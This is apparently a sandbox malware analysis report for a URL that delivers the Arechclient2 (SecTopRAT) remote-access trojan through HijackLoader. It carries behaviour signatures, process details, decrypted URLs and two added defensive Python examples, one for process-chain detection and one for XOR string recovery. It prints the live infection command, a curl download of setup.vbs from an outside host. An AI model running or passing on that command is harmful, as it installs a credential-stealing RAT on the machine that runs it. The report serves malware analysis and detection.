URL:

www.crashnotify.org/4KpraPV2

Full analysis: https://app.any.run/tasks/34b7356a-bf4d-4bdb-905e-7d3b5ff2dad4
Verdict: Malicious activity
Threats:

Arechclient2 (also tracked as SecTopRAT, the name used by the Suricata rules later in this report) is a .NET-based Remote Access Trojan (RAT) that collects sensitive information, such as browser credentials, from infected computers. It employs several stealth techniques, including Base64 encoding to obscure its code and the ability to pause activity to evade automated security tools. The malware can also adjust Windows Defender settings and uses code injection to run inside legitimate processes.

Analysis date: July 17, 2025, 20:12:37
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-exec
auto
generic
stealer
teapotstealer
arechclient2
backdoor
rat
hijackloader
loader
xor-url
Indicators:
MD5:

281FB1AD58687C2E533421E47A77C751

SHA1:

79C095D7D274BD5B990E536CCD46475727AEAEAF

SHA256:

5256A9928D1829D34B67851ADF17E1F81CB28D57FDAC987E89FA434501B6A557

SSDEEP:

3:EE+aG9U:rpG9U

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Creates internet connection object (SCRIPT)

      • wscript.exe (PID: 7704)
    • Sends HTTP request (SCRIPT)

      • wscript.exe (PID: 7704)
    • Checks whether a specified folder exists (SCRIPT)

      • wscript.exe (PID: 7704)
    • Opens an HTTP connection (SCRIPT)

      • wscript.exe (PID: 7704)
    • Gets %appdata% folder path (SCRIPT)

      • wscript.exe (PID: 7704)
    • Accesses environment variables (SCRIPT)

      • wscript.exe (PID: 7704)
    • Gets path to any of the special folders (SCRIPT)

      • wscript.exe (PID: 7704)
    • Creates a new folder (SCRIPT)

      • wscript.exe (PID: 7704)
    • GENERIC has been found (auto)

      • Ente_Elec.exe (PID: 5812)
    • Executing a file with an untrusted certificate

      • DelModule86.exe (PID: 3488)
      • XPFix.exe (PID: 8016)
    • TEAPOT has been detected

      • RegAsm.exe (PID: 684)
    • Actions look like stealing of personal data

      • RegAsm.exe (PID: 684)
    • ARECHCLIENT2 has been detected (YARA)

      • RegAsm.exe (PID: 684)
    • HIJACKLOADER has been detected (YARA)

      • Ente_Elec.exe (PID: 5812)
    • XORed URL has been found (YARA)

      • RegAsm.exe (PID: 684)
    • ARECHCLIENT2 has been detected (SURICATA)

      • RegAsm.exe (PID: 684)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 7764)
    • Application launched itself

      • cmd.exe (PID: 7764)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 7704)
    • The process executes VB scripts

      • cmd.exe (PID: 7764)
    • Creates a Stream, which may work with files, input/output devices, pipes, or TCP/IP sockets (SCRIPT)

      • wscript.exe (PID: 7704)
    • Saves data to a binary file (SCRIPT)

      • wscript.exe (PID: 7704)
    • Writes binary data to a Stream object (SCRIPT)

      • wscript.exe (PID: 7704)
    • Creates a Folder object (SCRIPT)

      • wscript.exe (PID: 7704)
    • Process drops legitimate windows executable

      • wscript.exe (PID: 7704)
      • Ente_Elec.exe (PID: 7132)
    • Executable content was dropped or overwritten

      • wscript.exe (PID: 7704)
      • Ente_Elec.exe (PID: 7132)
      • Ente_Elec.exe (PID: 5812)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 7704)
    • The process drops C-runtime libraries

      • wscript.exe (PID: 7704)
      • Ente_Elec.exe (PID: 7132)
    • Starts itself from another location

      • Ente_Elec.exe (PID: 7132)
    • Connects to unusual port

      • RegAsm.exe (PID: 684)
    • Searches for installed software

      • RegAsm.exe (PID: 684)
    • Reads the date of Windows installation

      • DelModule86.exe (PID: 3488)
  • INFO

    • Application launched itself

      • msedge.exe (PID: 2976)
      • chrome.exe (PID: 5928)
      • chrome.exe (PID: 7508)
      • chrome.exe (PID: 4680)
      • msedge.exe (PID: 7676)
      • chrome.exe (PID: 7580)
      • chrome.exe (PID: 7856)
      • chrome.exe (PID: 1480)
      • msedge.exe (PID: 6676)
      • msedge.exe (PID: 8432)
      • msedge.exe (PID: 7056)
      • msedge.exe (PID: 7364)
      • msedge.exe (PID: 2356)
    • Checks supported languages

      • identity_helper.exe (PID: 7640)
      • curl.exe (PID: 1336)
      • Update.exe (PID: 7732)
      • Ente_Elec.exe (PID: 7132)
      • Ente_Elec.exe (PID: 5812)
      • RegAsm.exe (PID: 684)
      • DelModule86.exe (PID: 3488)
    • Reads the computer name

      • identity_helper.exe (PID: 7640)
      • curl.exe (PID: 1336)
      • Update.exe (PID: 7732)
      • Ente_Elec.exe (PID: 7132)
      • Ente_Elec.exe (PID: 5812)
      • RegAsm.exe (PID: 684)
      • DelModule86.exe (PID: 3488)
    • Reads Environment values

      • identity_helper.exe (PID: 7640)
      • RegAsm.exe (PID: 684)
    • Manual execution by a user

      • cmd.exe (PID: 7764)
    • Execution of CURL command

      • cmd.exe (PID: 7764)
    • Create files in a temporary directory

      • curl.exe (PID: 1336)
      • Ente_Elec.exe (PID: 5812)
      • RegAsm.exe (PID: 684)
    • Checks proxy server information

      • wscript.exe (PID: 7704)
      • RegAsm.exe (PID: 684)
      • DelModule86.exe (PID: 3488)
      • slui.exe (PID: 7972)
    • The sample compiled with english language support

      • wscript.exe (PID: 7704)
      • Ente_Elec.exe (PID: 7132)
    • Creates files in the program directory

      • Ente_Elec.exe (PID: 7132)
      • Ente_Elec.exe (PID: 5812)
    • Reads the machine GUID from the registry

      • Update.exe (PID: 7732)
      • RegAsm.exe (PID: 684)
      • DelModule86.exe (PID: 3488)
    • Creates files or folders in the user directory

      • Ente_Elec.exe (PID: 5812)
    • The sample compiled with chinese language support

      • Ente_Elec.exe (PID: 5812)
    • Reads product name

      • RegAsm.exe (PID: 684)
    • Disables trace logs

      • RegAsm.exe (PID: 684)
    • Reads the software policy settings

      • DelModule86.exe (PID: 3488)
      • slui.exe (PID: 7972)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX in the full report
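The signatures above record a short, recognisable chain: cmd.exe runs curl with -k (certificate checks off) to write setup.vbs into the user's Temp directory, wscript.exe runs that VB script and drops executables, and RegAsm.exe, a signed .NET framework utility, is started with no arguments, matches the ARECHCLIENT2 rules and connects to an unusual port. Each link is cheap to flag in process-creation telemetry. The following is an added example, not part of the report and not ANY.RUN's detection logic: three rules run over constructed process events. The curl and RegAsm.exe command lines are the ones the report shows in Process information; the wscript.exe command line, the cmd.exe parent and the Update.exe path are assumptions, and PID 9001 is a constructed benign control.

```python
"""
Added example (not from the ANY.RUN report): flag the curl -> .vbs -> wscript ->
RegAsm.exe chain over process-creation records modelled loosely on Sysmon
Event ID 1. Sample events are constructed; see comments for what is assumed.
"""
import re
import shlex
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # full image path
    cmdline: str
    parent_image: str


TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|hta)\b", re.IGNORECASE)
# Signed .NET framework utilities commonly used as hosts for injected code.
DOTNET_HOSTS = {"regasm.exe", "regsvcs.exe", "installutil.exe",
                "msbuild.exe", "aspnet_compiler.exe"}


def basename(path: str) -> str:
    """Image file name, lower-cased, with surrounding quotes removed."""
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def argv(cmdline: str) -> list:
    # posix=False keeps Windows backslashes literal and honours double quotes.
    return shlex.split(cmdline, posix=False)


def rule_curl_drop(ev: ProcEvent):
    """curl writing its output (-o) under a Temp directory; note -k if present."""
    if basename(ev.image) != "curl.exe":
        return None
    args = argv(ev.cmdline)
    out = None
    for i, a in enumerate(args):
        if a in ("-o", "--output") and i + 1 < len(args):
            out = args[i + 1]
    if out is None or not TEMP_DIR.search(out):
        return None
    insecure = any(a in ("-k", "--insecure") for a in args)
    tail = " with TLS verification disabled (-k)" if insecure else ""
    return f"curl wrote {out} into a Temp directory{tail}"


def rule_script_host_temp(ev: ProcEvent):
    """wscript/cscript executing a script file that lives under Temp."""
    if basename(ev.image) not in ("wscript.exe", "cscript.exe"):
        return None
    targets = [a.strip('"') for a in argv(ev.cmdline)[1:]
               if SCRIPT_EXT.search(a) and TEMP_DIR.search(a)]
    if not targets:
        return None
    return f"script host executed {targets[0]} from a Temp directory"


def rule_dotnet_host_no_args(ev: ProcEvent):
    """A .NET utility with no arguments: legitimate use always passes an assembly."""
    name = basename(ev.image)
    if name not in DOTNET_HOSTS or len(argv(ev.cmdline)) > 1:
        return None
    return f"{name} started with no arguments by {basename(ev.parent_image)} (possible injection host)"


RULES = (rule_curl_drop, rule_script_host_temp, rule_dotnet_host_no_args)


def analyze(events) -> list:
    """Run every rule over every event; return one finding dict per hit."""
    findings = []
    for ev in events:
        for rule in RULES:
            detail = rule(ev)
            if detail:
                findings.append({"rule": rule.__name__, "pid": ev.pid, "detail": detail})
    return findings


# Constructed sample. PIDs and the curl / RegAsm.exe command lines follow the
# report; the wscript.exe command line, cmd.exe's parent and Update.exe's path
# are assumptions, and PID 9001 is a benign control that is not in the report.
SAMPLE_EVENTS = [
    ProcEvent(7764, r"C:\Windows\System32\cmd.exe", "cmd.exe", r"C:\Windows\explorer.exe"),
    ProcEvent(1336, r"C:\Windows\System32\curl.exe",
              r"curl -k -o C:\Users\admin\AppData\Local\Temp\\setup.vbs https://figg.b-cdn.net/setup.vbs",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(7704, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\admin\AppData\Local\Temp\setup.vbs"',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(684, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe",
              r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe",
              r"C:\Users\admin\AppData\Roaming\Update.exe"),
    ProcEvent(9001, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe",
              r'RegAsm.exe "C:\Program Files\Vendor\lib.dll" /codebase',
              r"C:\Windows\System32\msiexec.exe"),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f['rule']}] PID {f['pid']}: {f['detail']}")
```

RegAsm.exe started without an assembly argument normally prints its usage text and exits; one that stays resident and opens network connections, as PID 684 does here, is a strong sign that it is hosting injected code. The -k flag on its own is common in scripts, but combined with an output path under Temp and a .vbs extension it is worth an alert in its own right.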

xor-url

(PID) Process: (684) RegAsm.exe
Decrypted-URLs (14):
http://dl.google.com/chrome/install/375.126/chrome_installer.exe
https://bsc-dataseed1.binance.org/
https://bsc-dataseed1.defibit.io/?
https://bsc-dataseed1.ninicoin.io/E
https://bsc-dataseed2.binance.org/
https://bsc-dataseed2.defibit.io/
https://bsc-dataseed2.ninicoin.io/L
https://bsc-dataseed3.binance.org/z
https://bsc-dataseed3.defibit.io/1
https://bsc-dataseed3.ninicoin.io/B
https://bsc-dataseed4.binance.org/_@Vq'
https://bsc-dataseed4.defibit.io/
https://bsc-dataseed4.ninicoin.io/wX:
https://github.com
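The 14 URLs above were recovered by undoing an XOR-based string obfuscation, which is what the "XORed URL has been found (YARA)" signature on RegAsm.exe (PID 684) reports. The following is an added example, not the report's or ANY.RUN's code: it brute-forces a single-byte XOR key against a constructed blob using "http" as known plaintext, then reduces each recovered string to its hostname. The key 0x5A, the 40-byte slot layout and the filler bytes are assumptions made for the example; the report does not show how the sample stores its strings.

```python
"""
Added example (not from the report or from ANY.RUN): recover URLs from a blob
whose strings were XORed with one repeating key byte. Key, slot layout and
filler bytes are constructed for the example.
"""
import re

# Generous URL pattern over bytes. It deliberately accepts letters after the
# path so that an over-read into neighbouring data shows up as trailing junk.
URL_RE = re.compile(rb"https?://[A-Za-z0-9.\-]+(?:/[A-Za-z0-9._~\-/?=&%]*)?")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single key byte; the operation is its own inverse."""
    return bytes(b ^ key for b in data)


def find_xor_urls(blob: bytes, min_len: int = 12) -> dict:
    """Try all 256 single-byte keys; return {key: [urls]} for keys under which
    at least one URL of min_len bytes or more appears. The b"http" pre-check
    is the known-plaintext trick a YARA `xor` string modifier relies on."""
    hits = {}
    for key in range(256):
        plain = xor_bytes(blob, key)
        if b"http" not in plain:
            continue
        urls = [m.group(0) for m in URL_RE.finditer(plain) if len(m.group(0)) >= min_len]
        if urls:
            hits[key] = urls
    return hits


def host_of(url: bytes) -> str:
    """Reduce a recovered URL to its hostname, dropping any over-read tail."""
    return re.match(rb"https?://([^/]+)", url).group(1).decode("ascii")


def indicators(blob: bytes) -> dict:
    """{key: sorted unique hostnames}: the part of each string worth blocking on."""
    return {k: sorted({host_of(u) for u in urls}) for k, urls in find_xor_urls(blob).items()}


# --- constructed sample blob -------------------------------------------------
KEY = 0x5A      # assumed key for the example
SLOT = 40       # assumed fixed-size string slots


def _slot(s: bytes, filler: bytes = b"\x00") -> bytes:
    return (s + filler * SLOT)[:SLOT]


# Three hosts from the report's decrypted list. The last slot is padded with
# "E" instead of NUL to reproduce the trailing-junk effect seen in entries
# such as https://bsc-dataseed1.ninicoin.io/E in the report.
BLOB = xor_bytes(
    _slot(b"https://bsc-dataseed1.binance.org/")
    + _slot(b"https://github.com")
    + _slot(b"https://bsc-dataseed2.defibit.io/", filler=b"E"),
    KEY,
)

if __name__ == "__main__":
    for key, urls in find_xor_urls(BLOB).items():
        print(f"key 0x{key:02x}:")
        for u in urls:
            print("   ", u.decode("ascii", "replace"))
    print(indicators(BLOB))
```

Entries in the list above such as https://bsc-dataseed1.ninicoin.io/E and https://bsc-dataseed4.binance.org/_@Vq' have the shape of an over-read: the bytes that follow the string in the blob happen to XOR to printable characters, which the E-padded slot reproduces. Hunt and block on the hostnames, not the full paths. YARA can express the same brute force directly with a string such as "http://" carrying the modifier xor(0x01-0xff). The bsc-dataseed hosts are public Binance Smart Chain JSON-RPC endpoints; a RAT carrying a list of them typically reads its real C2 address from a contract on the chain (a dead-drop resolver). This report does not show that request, so treat it as a hypothesis to confirm in the PCAP.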
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes
391
Monitored processes
241
Malicious processes
6
Suspicious processes
2

Behavior graph

Processes in the graph, in order of appearance, with the many msedge.exe and chrome.exe renderer, utility and extension child processes collapsed ("no specs" marks processes without signature hits):
start
msedge.exe (browser and its child processes, repeated throughout the graph)
identity_helper.exe no specs
identity_helper.exe no specs
cmd.exe no specs
conhost.exe no specs
slui.exe
cmd.exe no specs
curl.exe
wscript.exe
update.exe no specs
ente_elec.exe #GENERIC
ente_elec.exe
regasm.exe #ARECHCLIENT2
chrome.exe (browser and its child processes, repeated)
delmodule86.exe
xpfix.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
PID:
536
CMD:
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\admin\AppData\Local\Temp\vzidxzrt.qno" --extension-process --renderer-sub-type=extension --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=3716,i,4724139898744864779,7694668970961475985,262144 --variations-seed-version --mojo-platform-channel-handle=4144 /prefetch:2
Path:
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process:
msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
684
CMD:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
Path:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
Parent process:
Update.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Assembly Registration Utility
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\regasm.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
xor-url
(PID) Process: (684) RegAsm.exe
Decrypted-URLs (14):
http://dl.google.com/chrome/install/375.126/chrome_installer.exe
https://bsc-dataseed1.binance.org/
https://bsc-dataseed1.defibit.io/?
https://bsc-dataseed1.ninicoin.io/E
https://bsc-dataseed2.binance.org/
https://bsc-dataseed2.defibit.io/
https://bsc-dataseed2.ninicoin.io/L
https://bsc-dataseed3.binance.org/z
https://bsc-dataseed3.defibit.io/1
https://bsc-dataseed3.ninicoin.io/B
https://bsc-dataseed4.binance.org/_@Vq'
https://bsc-dataseed4.defibit.io/
https://bsc-dataseed4.ninicoin.io/wX:
https://github.com
PID:
828
CMD:
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=5488,i,12469882710374697201,17715989984810711768,262144 --variations-seed-version --mojo-platform-channel-handle=5584 /prefetch:1
Path:
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process:
msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
1156
CMD:
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\admin\AppData\Local\Temp\tegw23i4.j3b" --extension-process --renderer-sub-type=extension --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=4288,i,2099613050972961947,5883793109786222923,262144 --variations-seed-version --mojo-platform-channel-handle=4368 /prefetch:2
Path:
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process:
msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
1156
CMD:
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --user-data-dir="C:\Users\admin\AppData\Local\Temp\h0oc1iuq.qb5" --always-read-main-dll --field-trial-handle=2592,i,6856007942761450023,10968364751178475654,262144 --variations-seed-version --mojo-platform-channel-handle=2572 /prefetch:8
Path:
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process:
msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
1160
CMD:
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3632,i,12469882710374697201,17715989984810711768,262144 --variations-seed-version --mojo-platform-channel-handle=3776 /prefetch:1
Path:
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process:
msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
1216
CMD:
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\admin\AppData\Local\Temp\tegw23i4.j3b" --extension-process --renderer-sub-type=extension --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=4216,i,2099613050972961947,5883793109786222923,262144 --variations-seed-version --mojo-platform-channel-handle=4464 /prefetch:2
Path:
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process:
msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
1216
CMD:
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\admin\AppData\Local\Temp\cycea4ts.twt" --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3132,i,12025552505710583791,14017146673815780957,262144 --variations-seed-version --mojo-platform-channel-handle=3188 /prefetch:1
Path:
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process:
msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
1336
CMD:
curl -k -o C:\Users\admin\AppData\Local\Temp\\setup.vbs https://figg.b-cdn.net/setup.vbs
Path:
C:\Windows\System32\curl.exe
Parent process:
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll
PID:
1388
CMD:
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --user-data-dir="C:\Users\admin\AppData\Local\Temp\cfo4bcd2.dsm" --extension-process --enable-dinosaur-easter-egg-alt-images --no-sandbox --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3100,i,14203269924794428368,488048664498352189,262144 --variations-seed-version --mojo-platform-channel-handle=3188 /prefetch:2
Path:
C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process:
chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
Total events
34 851
Read events
34 730
Write events
120
Delete events
1

Modification events

(PID) Process: (2976) msedge.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation: write
Name: failed_count
Value:
0
(PID) Process: (2976) msedge.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation: write
Name: state
Value:
2
(PID) Process: (2976) msedge.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation: write
Name: state
Value:
1
(PID) Process: (2976) msedge.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\StabilityMetrics
Operation: write
Name: user_experience_metrics.stability.exited_cleanly
Value:
0
(PID) Process: (2976) msedge.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault
Operation: write
Name: S-1-5-21-1693682860-607145093-2874071422-1001
Value:
E52A5BEABB982F00
(PID) Process: (2976) msedge.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\656180
Operation: write
Name: WindowTabManagerFileMappingId
Value:
{0518BE18-4115-41E0-A66E-E3101BE51057}
(PID) Process: (2976) msedge.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: MicrosoftEdgeAutoLaunch_29EBC4579851B72EE312C449CF839B1A
Value:
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
(PID) Process: (2976) msedge.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\656180
Operation: write
Name: WindowTabManagerFileMappingId
Value:
{E2E15FAD-77F8-488F-AE5C-B7554A5C2A82}
(PID) Process: (2976) msedge.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\EdgeUpdate\ClientStateMedium\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\LastWasDefault
Operation: write
Name: S-1-5-21-1693682860-607145093-2874071422-1001
Value:
C95F99EABB982F00
(PID) Process: (2976) msedge.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\EdgeUpdate\Clients\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}\Commands\on-logon-autolaunch
Operation: write
Name: Enabled
Value:
0
Executable files
28
Suspicious files
718
Text files
345
Unknown types
380

Dropped files

PID
Process
Filename
Type
2976  msedge.exe  C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\ClientCertificates\LOG.old~RF18cd9c.TMP
MD5:
SHA256:
2976  msedge.exe  C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\ClientCertificates\LOG.old
MD5:
SHA256:
2976  msedge.exe  C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old~RF18cdbb.TMP
MD5:
SHA256:
2976  msedge.exe  C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old
MD5:
SHA256:
2976  msedge.exe  C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old~RF18cdda.TMP
MD5:
SHA256:
2976  msedge.exe  C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old
MD5:
SHA256:
